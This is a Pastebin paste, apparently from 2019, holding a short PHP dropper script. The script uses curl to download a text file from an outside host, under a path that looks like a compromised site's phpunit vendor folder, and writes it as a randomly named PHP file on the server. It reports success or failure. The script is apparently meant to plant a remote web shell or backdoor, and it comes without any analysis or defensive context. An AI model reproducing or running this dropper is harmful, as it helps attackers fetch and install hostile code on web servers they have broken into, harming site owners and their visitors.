Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2019
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. <?php
  2. $ch = curl_init();
  3. curl_setopt($ch, CURLOPT_URL, 'http://curcumaplus.co.id/vendor/phpunit/phpunit/src/Util/PHP/0b.txt');
  4. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  5. $output = curl_exec($ch);
  6. curl_close($ch);
  7. $random = rand(10, 10000);
  8. $write = file_put_contents("fuck-{$random}.php", $output);
  9. if($write) {
  10. echo "Success : fuck-{$random}.php";
  11. } else {
  12. echo "Failed : fuck-{$random}.php";
  13. }
  14. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement